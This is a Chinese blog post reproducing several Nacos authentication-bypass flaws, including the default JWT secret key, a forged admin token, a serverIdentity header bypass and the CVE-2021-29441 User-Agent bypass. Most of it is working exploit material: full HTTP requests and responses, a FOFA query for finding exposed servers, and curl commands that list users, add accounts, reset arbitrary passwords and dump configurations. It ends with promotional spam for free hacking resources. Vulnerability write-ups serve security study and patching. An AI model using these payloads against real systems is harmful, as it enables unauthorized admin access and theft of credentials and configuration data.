Nacos漏洞总结复现

于 2024-08-26 15:13:27 发布
阅读量632 收藏 12
点赞数 18
文章标签: 产品经理 面试 安全架构 职场和发展 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84578953/article/details/141564805
版权

Nacos漏洞总结复现

一、Nacos默认key导致权限绕过登陆

0x00 漏洞描述

Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。 通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户

0x01 漏洞影响

0.1.0 <= Nacos <= 2.2.0

0x02 漏洞搜索

fofa:app=“NACOS”

0x03 漏洞复现

在nacos中,token.secret.key值是固定死的,位置在conf下的application.properties中:

nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

1.获取token

利用该默认key可进行jwt构造,直接进入后台,构造方法:
https://jwt.io/中:输入默认key:

SecretKey012345678901234567890123456789012345678901234567890123456789

然后再payload里面输入:

{

“sub”: “nacos”,

“exp”: 1678899909

}

在这里注意:1678899909这个值是unix时间戳,换算一下,要比你系统当前的时间更晚,比如当前的时间是2023年03月15日22:11:09,在这里面的时间戳时间是3月16号了:

注意:

以下是伪造JWT值绕过权限的测试结果

1、延长时间戳,POST 密码错误,用户名正确 ✅

2、延长时间戳,POST 密码错误,用户名错误 ✅

3、删除时间戳,POST 密码错误,用户名错误 ✅

复制上面得到的值,在burp里面选择登录之后构造:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

方框里面需要自行添加:

POST /nacos/v1/auth/users/login HTTP/1.1

Host: 10.211.55.5:8848

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0

Accept: application/json, text/plain, */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 33

Origin: http://10.211.55.5:8848

Connection: close

Referer: http://10.211.55.5:8848/nacos/index.html

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

username=crowsec&password=crowsec

此时就得到了token信息:

HTTP/1.1 200

Vary: Origin

Vary: Access-Control-Request-Method

Vary: Access-Control-Request-Headers

Content-Security-Policy: script-src ‘self’

Set-Cookie: JSESSIONID=D90CF6E5B233685E4A39C1B1BDA9F185; Path=/nacos; HttpOnly

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

Content-Type: application/json

Date: Wed, 15 Mar 2023 14:13:22 GMT

Connection: close

Content-Length: 197

{“accessToken”:“eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s”,“tokenTtl”:18000,“globalAdmin”:true,“username”:“nacos”}

此时就得到了nacos的token信息。

2.利用获取token登录后台

如何登录呢,在这里需要用假账号登录之后,再修改返回包就行了,试试看:
先用假账号登录,用burp拦截:

这肯定进不去的,在这里修改返回包,右键看下这个:

然后Forward,这边返回的信息肯定是无效的:

在这里使用刚刚burp里面生成的返回包进行替换,全部复制过去:

再forward一次:

此时就已经进去了:

3.使用默认密钥生成的JWT查看当前用户名和密码

GET /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s&pageNo=1&pageSize=9 HTTP/1.1

Host: {{Hostname}}

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Connection: close

If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMT

Upgrade-Insecure-Requests: 1

accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

4.利用默认密钥,添加hellonacos用户密码为hellonacos,创建成功

POST /nacos/v1/auth/users HTTP/1.1

Host: {{Hostname}}

User-Agent: Mozilla/5.0

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMT

Content-Type: application/x-www-form-urlencoded

Content-Length: 39

username=hellonacos&password=hellonacos

二、Nacos默认配置未授权访问漏洞

http://10.10.84.207:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken

http://your_ip:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9

三、 Nacos2.2.0权限绕过

Header中添加serverIdentity: security能直接绕过身份验证查看用户列表

如果没有或者不对应则返回403

四、Nacos1.x.x版本User-Agent权限绕过((CVE-2021-29441)
0x01 漏洞描述

在 1.4.1 及更早版本的 Nacos 中,当配置为使用身份验证 (Dnacos.core.auth.enabled=true) 时,会使用 AuthFilter servlet 过滤器来强制实施身份验证,从而跳过身份验证检查。此机制依赖于用户代理 HTTP 标头,因此很容易被欺骗。此问题可能允许任何用户在 Nacos 服务器上执行任何管理任务。

0x02 环境搭建

docker run -d -p 8848:8848 hglight/cve-2021-29441

0x03 漏洞影响

Nacos <= 1.4.1

0x04 漏洞复现

    
    
     
           
      
       
       ```
      
      

       
       1.修改User-Agent的值为Nacos-Server到请求包中,
       
       添
       
       加Header头后访问
       
       http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
       
       可以看到返回值为200,且内容中是否包含
       
       pageItems
      
      

      
      

       
       

        
        GET /nacos/v1/auth/users/?pageNo=1&pageSize=9 HTTP/1.1
[](https://blog.csdn.net/m0_64910183/article/details/130144800?spm=1001.2014.3001.5502)Host: 192.168.246.138:8848
[](https://blog.csdn.net/m0_64910183/article/details/130144800?spm=1001.2014.3001.5502)User-Agent: Nacos-Server  
       
       

       
       

        
        

         
         ![](https://img-blog.csdnimg.cn/img_convert/870c929ad4b75f75daa1722406a0d643.png)
        
        

       
       

      
      

      
      

       
       

        
        或者使用命令访问:
       
       

       
       

        
        读取用户密码:
       
       

       
       

        
        curl  
        
        'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken=' -H 
        
        'User-Agent: Nacos-Server'
       
       

      
      

      
      

       
       curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&
       
       search=blur' -H 'User-Agent: Nacos-Server'
       
         
curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&
       
       search=accurate' -H 'User-Agent: Nacos-Server'
      
      

      
      

       
       未授权添加用户
      
      

      
      

       
       curl -X POST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test1&password=test1' -H 'User-Agent:Nacos-Server
      
      

      
      

       
       任意用户密码更改
      
      

      
      

       
       curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken=' -H 'User-Agent:Nacos-Server' -d 'username=test1&newPassword=test2'
      
      

      
      

       
       读取配置文件
      
      

      
      

       
       curl -X GET 'http://127.0.0.1:8848/nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99’
      
      

      
      

       
       curl -X GET 'http://127.0.0.1:8848/nacos/v1/cs/configs?search=blur&dataId=&group=&pageNo=1&pageSize=99’
      
      

      
      

       
       添加Header头后使用POST方式请求http://target:8848/nacos/v1/auth/users?username=vulhub&password=vulhub添加一个新用户,账号密码都为vulhub
      
      

      
      

       
       POST 
       
       /nacos/v1/auth/users?username=hglight&password=hglight 
       
       HTTP
       
       /
       
       1.1

       
       [](https://blog.csdn.net/m0_64910183/article/details/130144800?spm=1001.2014.3001.5502)
       
       Host
       
       : 
       
       192.168.246.138:8848

       
       [](https://blog.csdn.net/m0_64910183/article/details/130144800?spm=1001.2014.3001.5502)
       
       User-Agent
       
       : 
       
       Nacos-Server
      
      

      
      

       
       或者
      
      

      
      

       
       POST /nacos/v1/auth/users HTTP/1.1
      
      

      
      

       
       Host: 192.168.31.64:8848
      
      

      
      

       
       Cache-Control: max-age=0
      
      

      
      

       
       Upgrade-Insecure-Requests: 1
      
      

      
      

       
       User-Agent: Nacos-Server
      
      

      
      

       
       Accept-Encoding: gzip, deflate
      
      

      
      

       
       Accept-Language: zh-CN,zh;q=0.9
      
      

      
      

       
       Connection: close
      
      

      
      

       
       Content-Type: application/x-www-form-urlencoded
      
      

      
      

       
       Content-Length: 27
      
      

      
      

       
       username=hglight&password=hglight
      
      

      
      

       
       

        
        ![](https://img-blog.csdnimg.cn/img_convert/78e5b89809ae9e233bf4518be4274adb.png)
       
       

       
         
      
      

      
      

       
       

        
        

再次查看用户列表,返回的用户列表数据中,多了一个我们通过绕过鉴权创建的新用户

        
        

         
         ```
[](https://blog.csdn.net/m0_64910183/article/details/130144800?spm=1001.2014.3001.5502)GET /nacos/v1/auth/users/?pageNo=1&pageSize=9 HTTP/1.1
[](https://blog.csdn.net/m0_64910183/article/details/130144800?spm=1001.2014.3001.5502)Host: 192.168.246.138:8848
[](https://blog.csdn.net/m0_64910183/article/details/130144800?spm=1001.2014.3001.5502)User-Agent: Nacos-Server

     ```
      
      

       
       ![](https://img-blog.csdnimg.cn/img_convert/5e35faa54b702737b08d29d7902c1cf0.png)
      
      

      
      

       
       访问http://IP:8848/nacos使用新建用户登录,此时表示漏洞利用成功
      
      

      
      

       
       

        
        ![](https://img-blog.csdnimg.cn/img_convert/f999bbc518ff324c0bb6151a00114269.jpeg)
       
       

       
       

        
        

         
         ![](https://img-blog.csdnimg.cn/img_convert/b135b18512e02bb436aa6fd7d2be26c1.jpeg)
        
        

       ### **今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。**

网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

【点击领取】网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。【点击领取视频教程】

在这里插入图片描述

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

网安这样学
关注
  • 18
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透测试漏洞复现nacos未授权访问漏洞复现并getshell
HACKONE的博客
03-30 797
nacos未授权访问。
漏洞复现Nacos系列多漏洞复现
失心少年
10-11 591
也就是nacos的密钥是有默认值的,其鉴权是JWT,我们知道密钥即可伪造一个恶意的JWT令牌来攻击,对于jwt加密 其实就是用了base64 密钥是写死在源码里面的 所以直接可以用jwt伪造攻击,对应就是数据包的accesstoken。在
Nacos权限认证绕过漏洞复现
时乙的博客
03-12 2544
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
漏洞复现Nacos 控制台默认口令漏洞
晚风不及你
04-28 553
Nacos控制台默认口令漏洞是一个重要的安全问题,它涉及到未经授权的访问风险。在Nacos的某些版本中,如果使用了默认的口令或密钥,攻击者可能会利用这些默认设置来绕过身份认证,直接获得对Nacos的访问权限。
Nacos未授权访问漏洞复现,2024年最新网络安全基础开发入门
2401_84181309的博客
04-10 700
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
[创业之路-141] :产品经理 - NPDP概述
文火冰糖(王文兵)的博客
08-23 873
NPDP2.1 概述NPDP是New Product Development Professional的缩写,即新产品开发专业人员认证。这是由美国产品开发与管理协会(PDMA)提供的一项专业认证,旨在评估和认可个人在产品开发和管理领域的专业能力。定义:NPDP认证是一个集理论、方法与实践为一体的全方位知识体系,其核心价值在于整合产品开发管理的理论与实践,包括新产品开发策略、研发流程管理、市场研究、营销规划、团队管理、项目管理等多个方面。背景。
Tita的OKR :产品经理的OKR
Tita OKR
08-23 293
产品经理制定的OKR,对组织发展有重大的意义,它能促使产品经理,产品团队,乃至是公司全体员工走出舒适区,超越能力边界。正因为挑战的存在,才使得产品经理才有忧患意识,不断改进产品,从而适应竞争激烈的市场。在产品发布之前获得基于价值的关键结果是可以的,但是在发布之后,最好专注于产品的最关键指标。关键成果 4:完成 10000 份用户调查问卷,收集用户数据。关键成果 3:为产品中 Top 5% 的用户建立用户模型。关键成果 1:参与用户研究团队的用户访谈 5 次。关键成果1:将发布后发现的错误减少30%
常见面试问题(Python)
jiao_mrswang的博客
08-23 231
5、GIL全局解释锁。
Android笔试面试题AI答之Kotlin(20)
学无止境,止于至善
08-21 773
Elvis操作符(?:)是Kotlin(以及一些其他编程语言)中用于处理可空表达式的一种简洁方式。它允许在表达式的值为null时提供一个默认值,从而简化了空值的处理。在Kotlin中,构造函数(Constructor)是类的一个特殊方法,它用于初始化新创建的对象。与Java不同,Kotlin中的构造函数不是通过名称来定义的,而是与类名相同,并且没有返回类型(即使是void)。Kotlin支持主构造函数和次构造函数(也称为辅助构造函数或二级构造函数)。
力扣218题详解:天际线问题的多种解法与复杂度分析
10年数据\经营分析经验,现任大厂数据分析负责人
08-20 913
本文详细解读了力扣第218题“天际线问题”,通过使用扫描线法和优先队列高效地解决了这一问题,并提供了详细的解释和模拟面试问答。希望读者通过本文的学习,能够在力扣刷题的过程中更加得心应手。
Spring面试题二
最新发布
m0_74249133的博客
08-24 808
如果 Bean 在 Spring 配置文件中配置了。
用一个具体例子说明什么是提示词工程师
fertiland的专栏
08-21 554
您好,欢迎来到面试!我是今天的面试官,非常高兴能和您进行这次交流。为了确保整个面试流程的顺利进行,我们会按照既定的环节来推进面试。首先,我想了解一下您的意向岗位是什么呢?您说:基于大模型的应用系统开发ChatGPT 说:ChatGPT好的,我已经记录了您的意向岗位是“基于大模型的应用系统开发”。接下来,您更希望由技术主管还是经理来进行这次面试呢?您说:技术主管来面试ChatGPT 说:ChatGPT明白了,您希望由技术主管来进行面试。我会按照您的意愿进行安排。
梦与不存在的幻境
weixin_66580750的博客
08-21 341
-----------编者 2024年8月21日21:30:32。专栏正式开放订阅时间:2024年8月25日23:59:00。本文同步转发:CSDN,ACGO,LUOGU,WEIBO。专栏现行开放公示时间:2024年8月23日0:00:00。里面是一群年轻人努力的向前奔跑,甚至没注意到后面的老人。新专栏[梦与不存在的幻境],即将推出,敬请期待!专栏下半篇开放时间待定,敬请期待!
ORM底层的原理
F-T-er
08-22 346
【代码】ORM底层的原理。
Leetcode面试经典150题-128.最长连续序列
个人专长:数据结构和算法、大数据、数据库、主流框架
08-23 341
Leetcode面试经典150题-128.最长连续序列,同时也是字节面试高频题频次第15高的题,务必掌握
Android笔试面试题AI答之Kotlin(17)
学无止境,止于至善
08-21 832
在Kotlin中,你可以使用关键字来定义一个伴侣对象。这个对象将自动实现该类的伴生接口(如果Kotlin编译器生成的话),这使得你可以通过类名直接访问伴侣对象中的属性和方法。counter++@JvmStatic // 用于Java互操作// 使用伴侣对象println(MyClass.getCounter()) // 输出 1虽然高阶函数和Lambda表达式本身并不直接提供性能优化的手段,但它们通过改善代码结构、提高代码的可重用性和可读性,以及促进函数式编程风格,间接地促进了性能优化。
0819、0820梳理及一些面试题梳理
G254560543875660的博客
08-20 975
物数网传会表应、网络接口层,网络层,运输层,应用层。指针数组和数组指针的区别。TCP和UDP的区别。
Java笔试面试题AI答之线程(7)
学无止境,止于至善
08-23 662
AQS框架是Java并发包中的一个核心部分,它提供了一种基于FIFO等待队列的同步机制,用于管理等待线程并控制资源的获取和释放。通过定义一套模板方法,AQS允许子类根据需要实现自定义的同步器。AQS框架在单体架构和微服务项目中单个服务内部的线程同步和并发控制中发挥着重要作用。AQS通过提供独占模式和共享模式,以及相应的tryAcquiretryRelease和等方法,允许基于AQS的同步器根据具体需求选择合适的资源共享方式。
nacos漏洞如何触发
06-03
Nacos存在多个漏洞,不同的漏洞触发方式也不同。以下是一些常见的漏洞触发方式: 1. 认证绕过漏洞:攻击者可以通过构造恶意请求,绕过Nacos的身份认证机制,进而获取敏感信息或者执行未授权操作。 2. SQL注入漏洞:攻击者可以通过在请求参数中注入恶意SQL语句,来执行非授权的数据库操作,包括敏感数据泄露、数据库删除等。 3. 信息泄露漏洞:攻击者可以通过发送恶意请求,获取Nacos中存储的敏感信息,如用户名、密码、密钥等。 4. 任意文件读取漏洞:攻击者可以通过构造恶意请求,读取Nacos服务器上的任意文件,包括敏感的配置文件、日志文件等。 5. 任意文件写入漏洞:攻击者可以通过构造恶意请求,将恶意文件写入到Nacos服务器上,进而执行任意代码。 总之,Nacos漏洞的触发方式多种多样,攻击者可以通过各种手段来攻击Nacos服务器。因此,在使用Nacos时,必须要加强安全措施,包括加强密码管理、限制访问权限等,以避免可能的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值